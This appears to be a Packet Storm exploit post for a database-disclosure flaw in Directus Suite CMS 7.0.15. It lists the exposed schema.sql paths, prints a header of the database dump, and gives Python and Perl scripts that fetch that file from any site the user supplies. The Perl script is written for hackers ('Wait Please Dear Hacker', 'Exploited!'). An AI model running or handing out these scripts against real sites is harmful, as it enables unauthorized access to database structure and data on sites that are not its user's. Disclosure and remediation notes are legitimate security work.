exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Directus Suite CMS 7.0.15 Database Disclosure

Directus Suite CMS 7.0.15 Database Disclosure
Posted Apr 2, 2019
Authored by KingSkrupellos

Directus Suite CMS version 7.0.15 suffers from a database disclosure vulnerability.

tags | exploit, info disclosure
SHA-256 | 99b82f9a3289ee4f2a4e0b468d1d0f0ad0bfbf9918460e33f0a5d2ade7128db2

Directus Suite CMS 7.0.15 Database Disclosure

Change Mirror Download
###########################################################################

# Exploit Title : Directus Suite CMS 7.0.15 Database Disclosure Exploit
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 02/04/2019
# Vendor Homepage : directus.io
# Software Download Link : github.com/directus/directus/archive/master.zip
# Software Information Link : docs.directus.io/guides/database.html#directus-schema
github.com/directus/directus
# Software Version : 7 - 7.0.9 - 7.0.15
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type :
CWE-200 [ Information Exposure ]
CWE-538 [ File and Directory Information Exposure ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
# Acunetix Information Link about => MySQL database dump
acunetix.com/vulnerabilities/web/mysql-database-dump/

###########################################################################

# Description about Software :
***************************
Directus 7 Suite — Future-Proof Headless CMS & API for Custom Databases.

Directus is an open-source suite of software that provides an instant API wrapper for SQL databases

and an intuitive Admin App for non-technical users to manage that content. It's like a safe, friendly, and

super-powered "database client" (eg: PHP-my-Admin or Sequel Pro).

###########################################################################

# Impact :
***********
* The product stores sensitive information in files or directories that are accessible

to actors outside of the intended control sphere.

* An information exposure is the intentional or unintentional disclosure of information

to an actor that is not explicitly authorized to have access to that information.

* A database dump contains a record of the table structure and/or the data from a database

and is usually in the form of a list of SQL statements. A database dump is most often used for

backing up a database so that its contents can be restored in the event of data loss.

This file contains a MySQL database dump. This information is highly sensitive

and should not be found on a production system.

* Remediation - Restrict access to this file or remove it from the system.

Information :
************
Database-First =>

Directus follows a database-first approach, storing all of your data unaltered
in pure SQL databases with that can be completely customized.

Access and Optimization =>

Directus mirrors your actual database so it will automatically stay in sync with
any changes made directly to the database! With the full power of SQL unlocked, you can:
Architect your actual database with meaningful table and column names
Infinitely optimize with indexing, datatypes, lengths, defaults, keys, encoding, etc
Update your database schema at any point and Directus will instantly reflect changes
Create, update, and delete content directly from the database

Direct Access =>

This database-first approach means that you have the option to completely bypass
Directus if needed. Connecting your application directly to the database means Directus is completed.

Creating a Database

# MySQL
Connect to MySQL:

$ mysql -h <host> -u <user> -p

The command above will ask you for the user password:

$ mysql -h localhost -u root -p
Enter password: ****

After you successfully log into MySQL, run the CREATE DATABASE command:

mysql> CREATE DATABASE directus;
Query OK, 1 row affected (0.00 sec)
# Directus Schema

This document provides an explanation of all tables and fields within the Directus schema boilerplate.

Name Description
directus_activity Log of all actions (eg: item updates) performed through the API (or App)
directus_activity_read Tracks if a user has seen an Activity/Message item
directus_collection_presets User's collection preferences and bookmarks for Item Listing page
directus_collections Information for database tables (collections) managed by Directus
directus_fields Information for database columns (fields) and their interfaces
directus_files Metadata for all files and embeds added to Directus
directus_folders Nestable virtual directories used to organize Directus files
directus_migrations Database schema changes for upgrades/downgrades created by Phinx
directus_permissions Defines specific API access rules for a specific Role
directus_relations Keys and junctions for field-level relationships between collections
directus_revisions The delta and full data snapshot for all item Activity (eg: updates)
directus_roles Listing of user roles that group together sets of permissions
directus_settings Ad-hoc key-value-pairs for storing Global and Extension settings
directus_user_roles Junction table allowing users to possess multiple roles
directus_users Directory of all App and API Users

###########################################################################

File :
*****
/directus/src/schema.sql

/src/schema.sql

/schema.sql

Information :
************
# Sequel Pro SQL dump
# Version 4541
# Host: localhost (MySQL 5.6.38)
# Database: directus

# Dump of table directus_activity

# Dump of table directus_activity_seen

# Dump of table directus_collection_presets

# Dump of table directus_collections

# Dump of table directus_fields

# Dump of table directus_files

# Dump of table directus_folders

# Dump of table directus_migrations

# Dump of table directus_permissions

# Dump of table directus_relations

# Dump of table directus_revisions

# Dump of table directus_roles

# Dump of table directus_settings

# Dump of table directus_user_roles

# Dump of table directus_users

###########################################################################

# Database Disclosure Information Exposure Exploit 1 :
***********************************************
#!/usr/bin/python
import string
import re
from urllib2 import Request, urlopen
disc = "/src/schema.sql"
url = raw_input ("URL: ")
req = Request(url+disc)
rta = urlopen(req)
print "Result"
html = rta.read()
rdo = str(re.findall("resources.*=*", html))
print rdo
exit

###########################################################################

# Database Disclosure Information Exposure Exploit 2 :
***********************************************
#!/usr/bin/perl -w
# Author : KingSkrupellos
# Team : Cyberizm Digital Security Army

use LWP::Simple;
use LWP::UserAgent;

system('cls');
system('Directus Suite CMS 7.0.15 Database Disclosure Exploit');
system('color a');


if(@ARGV < 2)
{
print "[-]How To Use\n\n";
&help; exit();
}
sub help()
{
print "[+] usage1 : perl $0 site.com /path/ \n";
print "[+] usage2 : perl $0 localhost / \n";
}
($TargetIP, $path, $File,) = @ARGV;

$File="src/schema.sql";
my $url = "http://" . $TargetIP . $path . $File;
print "\n Wait Please Dear Hacker!!! \n\n";

my $useragent = LWP::UserAgent->new();
my $request = $useragent->get($url,":content_file" => "D:/src/schema.sql");

if ($request->is_success)
{
print "[+] $url Exploited!\n\n";
print "[+] Database saved to D:/src/schema.sql\n";
exit();
}
else
{
print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";
exit();
}

###########################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

###########################################################################
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close